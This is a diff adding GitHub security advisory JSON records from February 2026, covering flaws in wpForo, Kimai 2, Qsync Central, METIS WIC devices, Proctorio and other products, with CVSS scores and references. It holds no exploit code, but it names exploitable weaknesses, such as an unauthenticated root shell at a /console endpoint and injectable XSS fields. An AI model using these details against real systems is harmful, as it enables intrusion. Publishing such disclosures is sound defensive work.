+{ + "schema_version": "1.4.0", + "id": "GHSA-8v4p-4wrw-v43w", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2026-0910" + ], + "details": "The wpForo Forum plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.4.13 via deserialization of untrusted input in the 'wpforo_display_array_data' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0910" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpforo/tags/2.4.13/admin/tools-tabs/debug.php#L198" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?old=3416158&old_path=wpforo%2Ftags%2F2.4.13%2Fadmin%2Ftools-tabs%2Fdebug.php&new=3446993&new_path=wpforo%2Ftags%2F2.4.14%2Fadmin%2Ftools-tabs%2Fdebug.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3c833223-c8c9-413f-9d72-6fb13101459b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T14:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9278-6hcj-2p4j/GHSA-9278-6hcj-2p4j.json b/advisories/unreviewed/2026/02/GHSA-9278-6hcj-2p4j/GHSA-9278-6hcj-2p4j.json new file mode 100644 index 0000000000000..010c8817c5b85 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9278-6hcj-2p4j/GHSA-9278-6hcj-2p4j.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9278-6hcj-2p4j", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2019-25317" + ], + "details": "Kimai 2 contains a persistent cross-site scripting vulnerability that allows attackers to inject malicious scripts into timesheet descriptions. Attackers can insert SVG-based XSS payloads in the description field to execute arbitrary JavaScript when the page is loaded and viewed by other users.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25317" + }, + { + "type": "WEB", + "url": "https://github.com/kevinpapst/kimai2/pull/962" + }, + { + "type": "WEB", + "url": "https://github.com/kevinpapst/kimai2" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47286" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/kimai-persistent-cross-site-scripting-xss" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-92hq-qvrx-74gm/GHSA-92hq-qvrx-74gm.json b/advisories/unreviewed/2026/02/GHSA-92hq-qvrx-74gm/GHSA-92hq-qvrx-74gm.json new file mode 100644 index 0000000000000..5d19920753911 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-92hq-qvrx-74gm/GHSA-92hq-qvrx-74gm.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-92hq-qvrx-74gm", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2025-8668" + ], + "details": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in E-Kalite Software Hardware Engineering Design and Internet Services Industry and Trade Ltd. Co. Turboard allows Reflected XSS.This issue affects Turboard: from 2025.07 through 11022026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8668" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0060" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T14:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-93qw-26xw-p89x/GHSA-93qw-26xw-p89x.json b/advisories/unreviewed/2026/02/GHSA-93qw-26xw-p89x/GHSA-93qw-26xw-p89x.json new file mode 100644 index 0000000000000..b959a2c005ee4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-93qw-26xw-p89x/GHSA-93qw-26xw-p89x.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-93qw-26xw-p89x", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-54146" + ], + "details": "A NULL pointer dereference vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54146" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9cqh-c6j9-hwfw/GHSA-9cqh-c6j9-hwfw.json b/advisories/unreviewed/2026/02/GHSA-9cqh-c6j9-hwfw/GHSA-9cqh-c6j9-hwfw.json new file mode 100644 index 0000000000000..d6f65eec38abe --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9cqh-c6j9-hwfw/GHSA-9cqh-c6j9-hwfw.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9cqh-c6j9-hwfw", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2025-52541" + ], + "details": "A DLL hijacking vulnerability in Vivado could allow a local attacker to achieve privilege escalation, potentially resulting in arbitrary code execution.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52541" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-8013.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-427" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9q6f-339m-42fv/GHSA-9q6f-339m-42fv.json b/advisories/unreviewed/2026/02/GHSA-9q6f-339m-42fv/GHSA-9q6f-339m-42fv.json new file mode 100644 index 0000000000000..4a8a214fb911b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9q6f-339m-42fv/GHSA-9q6f-339m-42fv.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9q6f-339m-42fv", + "modified": "2026-02-11T15:30:26Z", + "published": "2026-02-11T15:30:26Z", + "aliases": [ + "CVE-2025-58470" + ], + "details": "A path traversal vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58470" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9qqr-wpm4-gqc3/GHSA-9qqr-wpm4-gqc3.json b/advisories/unreviewed/2026/02/GHSA-9qqr-wpm4-gqc3/GHSA-9qqr-wpm4-gqc3.json new file mode 100644 index 0000000000000..182fcdf04cf0c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9qqr-wpm4-gqc3/GHSA-9qqr-wpm4-gqc3.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9qqr-wpm4-gqc3", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2019-25311" + ], + "details": "thesystem version 1.0 contains a persistent cross-site scripting vulnerability that allows attackers to inject malicious scripts through multiple server data input fields. Attackers can submit crafted script payloads in operating_system, system_owner, system_username, system_password, system_description, and server_name parameters to execute arbitrary JavaScript in victim browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25311" + }, + { + "type": "WEB", + "url": "https://github.com/kostasmitroglou/thesystem" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47440" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/thesystem-persistent-xss" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9vw9-245h-4g2j/GHSA-9vw9-245h-4g2j.json b/advisories/unreviewed/2026/02/GHSA-9vw9-245h-4g2j/GHSA-9vw9-245h-4g2j.json new file mode 100644 index 0000000000000..7d48e06ce974d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9vw9-245h-4g2j/GHSA-9vw9-245h-4g2j.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9vw9-245h-4g2j", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2026-1226" + ], + "details": "CWE‑94: Improper Control of Generation of Code vulnerability exists that could cause execution of untrusted or unintended code within the application when maliciously crafted design content is processed through a TGML graphics file.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1226" + }, + { + "type": "WEB", + "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-041-02&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-041-02.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T14:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9w4f-2qq2-5rc9/GHSA-9w4f-2qq2-5rc9.json b/advisories/unreviewed/2026/02/GHSA-9w4f-2qq2-5rc9/GHSA-9w4f-2qq2-5rc9.json index e36833493059e..a791f5f6885ff 100644 --- a/advisories/unreviewed/2026/02/GHSA-9w4f-2qq2-5rc9/GHSA-9w4f-2qq2-5rc9.json +++ b/advisories/unreviewed/2026/02/GHSA-9w4f-2qq2-5rc9/GHSA-9w4f-2qq2-5rc9.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9w4f-2qq2-5rc9", - "modified": "2026-02-10T18:30:40Z", + "modified": "2026-02-11T15:30:22Z", "published": "2026-02-10T18:30:40Z", "aliases": [ "CVE-2026-20841" @@ -22,6 +22,10 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841" + }, + { + "type": "WEB", + "url": "https://news.ycombinator.com/item?id=46971516" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-9wvg-f2jp-vhcf/GHSA-9wvg-f2jp-vhcf.json b/advisories/unreviewed/2026/02/GHSA-9wvg-f2jp-vhcf/GHSA-9wvg-f2jp-vhcf.json new file mode 100644 index 0000000000000..6554cbf8ca5a4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9wvg-f2jp-vhcf/GHSA-9wvg-f2jp-vhcf.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9wvg-f2jp-vhcf", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-57708" + ], + "details": "An allocation of resources without limits or throttling vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:H/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57708" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cj2c-wh4j-hw39/GHSA-cj2c-wh4j-hw39.json b/advisories/unreviewed/2026/02/GHSA-cj2c-wh4j-hw39/GHSA-cj2c-wh4j-hw39.json new file mode 100644 index 0000000000000..7e9d4a9f93dd8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cj2c-wh4j-hw39/GHSA-cj2c-wh4j-hw39.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cj2c-wh4j-hw39", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2025-12059" + ], + "details": "Insertion of Sensitive Information into Externally-Accessible File or Directory vulnerability in Logo Software Industry and Trade Inc. Logo j-Platform allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Logo j-Platform: from 3.29.6.4 through 13112025.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12059" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0061" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-538" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cp3m-5wf6-4649/GHSA-cp3m-5wf6-4649.json b/advisories/unreviewed/2026/02/GHSA-cp3m-5wf6-4649/GHSA-cp3m-5wf6-4649.json new file mode 100644 index 0000000000000..c63af0afe7e2a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cp3m-5wf6-4649/GHSA-cp3m-5wf6-4649.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cp3m-5wf6-4649", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2026-2248" + ], + "details": "METIS WIC devices (versions <= oscore 2.1.234-r18) expose a web-based shell at the /console endpoint that does not require authentication. Accessing this endpoint allows a remote attacker to execute arbitrary operating system commands with root (UID 0) privileges. This results in full system compromise, allowing unauthorized access to modify system configuration, read sensitive data, or disrupt device operations", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2248" + }, + { + "type": "WEB", + "url": "https://www.metis.tech" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f688-gwj3-8h54/GHSA-f688-gwj3-8h54.json b/advisories/unreviewed/2026/02/GHSA-f688-gwj3-8h54/GHSA-f688-gwj3-8h54.json new file mode 100644 index 0000000000000..a336e766e4f1e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f688-gwj3-8h54/GHSA-f688-gwj3-8h54.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f688-gwj3-8h54", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2026-2345" + ], + "details": "Proctorio Chrome Extension is a browser extension used for online proctoring. The extension contains multiple window.addEventListener('message', ...) handlers that do not properly validate the origin of incoming messages. Specifically, an internal messaging bridge processes messages based solely on the presence of a fromWebsite property without verifying the event.origin attribute.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2345" + }, + { + "type": "WEB", + "url": "https://www.hckrt.com/hacktivity/46b61f36-b685-4667-aebf-82a67ad69ad6" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-346" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fmj5-jwwm-6cm2/GHSA-fmj5-jwwm-6cm2.json b/advisories/unreviewed/2026/02/GHSA-fmj5-jwwm-6cm2/GHSA-fmj5-jwwm-6cm2.json new file mode 100644 index 0000000000000..ec9975c23b9fe --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fmj5-jwwm-6cm2/GHSA-fmj5-jwwm-6cm2.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fmj5-jwwm-6cm2", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2019-25309" + ], + "details": "Zilab Remote Console Server 3.2.9 contains an unquoted service path vulnerability that allows local attackers to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted binary path in the service configuration to inject malicious executables that will be run with LocalSystem permissions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25309" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47506" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/zilab-remote-console-server-zilab-remote-console-server-unquoted-service-path" + }, + { + "type": "WEB", + "url": "http://html.tucows.com/preview/340137/Zilab-Remote-Console-Server?q=remote+support" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-428" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fmmr-xg7j-x2cq/GHSA-fmmr-xg7j-x2cq.json b/advisories/unreviewed/2026/02/GHSA-fmmr-xg7j-x2cq/GHSA-fmmr-xg7j-x2cq.json new file mode 100644 index 0000000000000..70a64273f9fe8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fmmr-xg7j-x2cq/GHSA-fmmr-xg7j-x2cq.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fmmr-xg7j-x2cq", + "modified": "2026-02-11T15:30:24Z", + "published": "2026-02-11T15:30:24Z", + "aliases": [ + "CVE-2025-30266" + ], + "details": "A NULL pointer dereference vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30266" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fmxw-gfwm-67w3/GHSA-fmxw-gfwm-67w3.json b/advisories/unreviewed/2026/02/GHSA-fmxw-gfwm-67w3/GHSA-fmxw-gfwm-67w3.json new file mode 100644 index 0000000000000..c26a216b39835 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fmxw-gfwm-67w3/GHSA-fmxw-gfwm-67w3.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fmxw-gfwm-67w3", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2026-2250" + ], + "details": "The /dbviewer/ web endpoint in METIS WIC devices is exposed without authentication. A remote attacker can access and export the internal telemetry SQLite database containing sensitive operational data. Additionally, the application is configured with debug mode enabled, causing malformed requests to return verbose Django tracebacks that disclose backend source code, local file paths, and system configuration.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2250" + }, + { + "type": "WEB", + "url": "https://www.metis.tech" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-215" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-frff-9f6h-44cx/GHSA-frff-9f6h-44cx.json b/advisories/unreviewed/2026/02/GHSA-frff-9f6h-44cx/GHSA-frff-9f6h-44cx.json new file mode 100644 index 0000000000000..c95c37e497250 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-frff-9f6h-44cx/GHSA-frff-9f6h-44cx.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-frff-9f6h-44cx", + "modified": "2026-02-11T15:30:24Z", + "published": "2026-02-11T15:30:24Z", + "aliases": [ + "CVE-2025-30269" + ], + "details": "A use of externally-controlled format string vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to obtain secret data or modify memory.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30269" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-134" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fxh5-4p4v-76pm/GHSA-fxh5-4p4v-76pm.json b/advisories/unreviewed/2026/02/GHSA-fxh5-4p4v-76pm/GHSA-fxh5-4p4v-76pm.json new file mode 100644 index 0000000000000..883bfe9252302 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fxh5-4p4v-76pm/GHSA-fxh5-4p4v-76pm.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fxh5-4p4v-76pm", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-54152" + ], + "details": "A use of out-of-range pointer offset vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to read sensitive portions of memory.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54152" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-823" + ], + "severity": "LOW", + 